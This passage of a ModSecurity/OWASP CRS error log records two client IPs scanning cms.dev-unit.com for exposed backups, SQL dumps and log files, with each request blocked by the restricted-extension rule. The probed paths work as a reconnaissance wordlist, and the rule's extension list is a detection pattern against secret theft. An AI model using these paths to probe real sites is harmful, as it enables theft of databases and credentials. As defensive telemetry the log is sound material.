"OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/error.log"] [unique_id "aTIZuZnwJUCRcFMitsHeCgAAANQ"] [Fri Dec 05 01:31:08.886605 2025] [:error] [pid 14227:tid 14239] [client 54.255.245.214:45754] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aTIZvNtUeEOEcBEcGokUAwAAAIo"] [Fri Dec 05 01:31:09.507454 2025] [:error] [pid 14020:tid 14094] [client 54.255.245.214:45814] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/database.sql"] [unique_id "aTIZvSKlF99DO7XaM50FYwAAAEI"] [Fri Dec 05 01:31:10.124344 2025] [:error] [pid 14019:tid 14076] [client 54.255.245.214:45888] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/backup.sql"] [unique_id "aTIZvixVk-zXn9iOn0mV4wAAAAs"] [Fri Dec 05 01:31:10.741311 2025] [:error] [pid 14163:tid 14188] [client 54.255.245.214:45972] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/debug.log"] [unique_id "aTIZvpnwJUCRcFMitsHeJAAAANc"] [Fri Dec 05 01:31:12.086671 2025] [:error] [pid 14227:tid 14230] [client 54.255.245.214:46134] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/dump.sql"] [unique_id "aTIZwNtUeEOEcBEcGokUCwAAAIE"] [Fri Dec 05 01:31:17.091421 2025] [:error] [pid 14020:tid 14095] [client 54.255.245.214:46680] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/db_backup.sql"] [unique_id "aTIZxSKlF99DO7XaM50FagAAAEM"] [Fri Dec 05 01:31:34.157917 2025] [:error] [pid 14020:tid 14112] [client 54.255.245.214:48600] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/php_error.log"] [unique_id "aTIZ1iKlF99DO7XaM50FeQAAAFQ"] [Fri Dec 05 01:31:42.819840 2025] [:error] [pid 14019:tid 14075] [client 54.255.245.214:49564] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/errors.log"] [unique_id "aTIZ3ixVk-zXn9iOn0mWAwAAAAo"] [Fri Dec 05 01:31:44.171193 2025] [:error] [pid 14163:tid 14188] [client 54.255.245.214:49716] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/application.log"] [unique_id "aTIZ4JnwJUCRcFMitsHefgAAANc"] [Fri Dec 05 01:31:44.787257 2025] [:error] [pid 14227:tid 14250] [client 54.255.245.214:49774] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/app/logs/dev.log"] [unique_id "aTIZ4NtUeEOEcBEcGokUagAAAJU"] [Fri Dec 05 01:31:45.403679 2025] [:error] [pid 14163:tid 14171] [client 54.255.245.214:49830] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/app/logs/prod.log"] [unique_id "aTIZ4ZnwJUCRcFMitsHeggAAAMY"] [Fri Dec 05 01:31:46.018853 2025] [:error] [pid 14163:tid 14184] [client 54.255.245.214:49884] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/Thumbs.db"] [unique_id "aTIZ4pnwJUCRcFMitsHehgAAANM"] [Sat Dec 06 11:12:54.388124 2025] [:error] [pid 28201:tid 28206] [client 16.146.2.134:49238] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/error.log"] [unique_id "aTPzlgaaBQA8K9Y2IUPbrAAAAAM"] [Sat Dec 06 11:12:55.795428 2025] [:error] [pid 27204:tid 27222] [client 16.146.2.134:49264] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aTPzl_OyaOnBaPk9al_LfAAAAEE"] [Sat Dec 06 11:12:56.430438 2025] [:error] [pid 28201:tid 28214] [client 16.146.2.134:49266] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/database.sql"] [unique_id "aTPzmAaaBQA8K9Y2IUPbsAAAAAo"] [Sat Dec 06 11:12:57.079396 2025] [:error] [pid 27206:tid 27279] [client 16.146.2.134:49276] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/backup.sql"] [unique_id "aTPzmTVNQf_oW9-JXCoOvgAAAJM"] [Sat Dec 06 11:12:57.719931 2025] [:error] [pid 28201:tid 28230] [client 16.146.2.134:49280] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/debug.log"] [unique_id "aTPzmQaaBQA8K9Y2IUPbsgAAABg"] [Sat Dec 06 11:12:59.110612 2025] [:error] [pid 27209:tid 27258] [client 16.146.2.134:49306] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/dump.sql"] [unique_id "aTPzm-suS7TwaJcc3vHzsQAAAME"] [Sat Dec 06 11:13:04.215294 2025] [:error] [pid 28201:tid 28219] [client 16.146.2.134:54198] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/db_backup.sql"] [unique_id "aTPzoAaaBQA8K9Y2IUPbwwAAAA8"] [Sat Dec 06 11:13:19.286701 2025] [:error] [pid 27206:tid 27287] [client 16.146.2.134:41178] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/php_error.log"] [unique_id "aTPzrzVNQf_oW9-JXCoO0gAAAJc"] [Sat Dec 06 11:13:28.296377 2025] [:error] [pid 27204:tid 27239] [client 16.146.2.134:47774] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/errors.log"] [unique_id "aTPzuPOyaOnBaPk9al_LpQAAAFI"] [Sat Dec 06 11:13:29.718447 2025] [:error] [pid 27206:tid 27274] [client 16.146.2.134:47802] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/application.log"] [unique_id "aTPzuTVNQf_oW9-JXCoO2QAAAJA"] [Sat Dec 06 11:13:30.360603 2025] [:error] [pid 27209:tid 27266] [client 16.146.2.134:47806] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver 